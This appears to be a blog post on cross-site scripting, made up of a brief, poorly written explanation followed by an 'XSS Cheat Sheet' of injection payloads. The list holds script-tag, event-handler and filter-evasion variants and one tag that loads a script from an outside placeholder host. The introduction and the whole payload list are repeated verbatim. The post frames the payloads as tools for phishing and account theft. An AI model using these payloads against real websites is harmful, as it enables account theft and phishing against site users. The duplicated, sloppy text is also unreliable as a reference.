This vulnerability occurs due to Poor Developing application of the code.A Attacker able to inject his malicious HTML code through client web browsers.
Mostly The Whole XSS Attack is based on Javascript and HTML for Executing malicious Codes in Target Website .Once a attacker will be able to run his code with the Javascript on the Web then when the User will come to the site and click on that malicious link that Javascript will be executed .Mostly People Do XSS and Show a Pop-up With their Name to advertise themselves .
XSS can be used for Phishing as well as Stealing Accounts or we can do some Social Engineering with XSS.
XSS Cheat Sheet:
Mostly The Whole XSS Attack is based on Javascript and HTML for Executing malicious Codes in Target Website .Once a attacker will be able to run his code with the Javascript on the Web then when the User will come to the site and click on that malicious link that Javascript will be executed .Mostly People Do XSS and Show a Pop-up With their Name to advertise themselves .
XSS can be used for Phishing as well as Stealing Accounts or we can do some Social Engineering with XSS.
XSS Cheat Sheet:
<script>alert(1);</script>
<script>alert('XSS');</script>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=javascript:alert('XSS')>
<scr<script>ipt>alert('XSS');</scr</script>ipt>
'><script>alert(0)</script>
<img src=foo.png onerror=alert(/xssed/) />
<style>@import'ja asc
ipt:alert("XSS")';</style>
<? echo('<scr)'; echo('ipt>alert("XSS")</script>'); ?>
<marquee><script>alert('XSS')</script></marquee>
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<script src=http://yoursite.com/your_files.js></script>
</title><script>alert(/xss/)</script>
<IMG DYNSRC="javascript:alert('XSS')">
<img src=javascript:alert('XSS')>
<script language=JavaScript>alert('XSS')</script>
<body onunload=javascript:alert('XSS');>
<body onLoad='alert('XSS');'
[color=red' onmouseover='alert('xss')']mouse over[/color]
'/></a></><img src=1.gif onerror=alert(1)>
window.alert('Bonjour !');
<div style='x:expression((window.r==1)?'':eval('r=1;
<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
'>><marquee><h1>XSS</h1></marquee>
<script>alert('XSS');</script>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=javascript:alert('XSS')>
<scr<script>ipt>alert('XSS');</scr</script>ipt>
'><script>alert(0)</script>
<img src=foo.png onerror=alert(/xssed/) />
<style>@import'ja asc
ipt:alert("XSS")';</style>
<? echo('<scr)'; echo('ipt>alert("XSS")</script>'); ?>
<marquee><script>alert('XSS')</script></marquee>
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<script src=http://yoursite.com/your_files.js></script>
</title><script>alert(/xss/)</script>
<IMG DYNSRC="javascript:alert('XSS')">
<img src=javascript:alert('XSS')>
<script language=JavaScript>alert('XSS')</script>
<body onunload=javascript:alert('XSS');>
<body onLoad='alert('XSS');'
[color=red' onmouseover='alert('xss')']mouse over[/color]
'/></a></><img src=1.gif onerror=alert(1)>
window.alert('Bonjour !');
<div style='x:expression((window.r==1)?'':eval('r=1;
<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
'>><marquee><h1>XSS</h1></marquee>
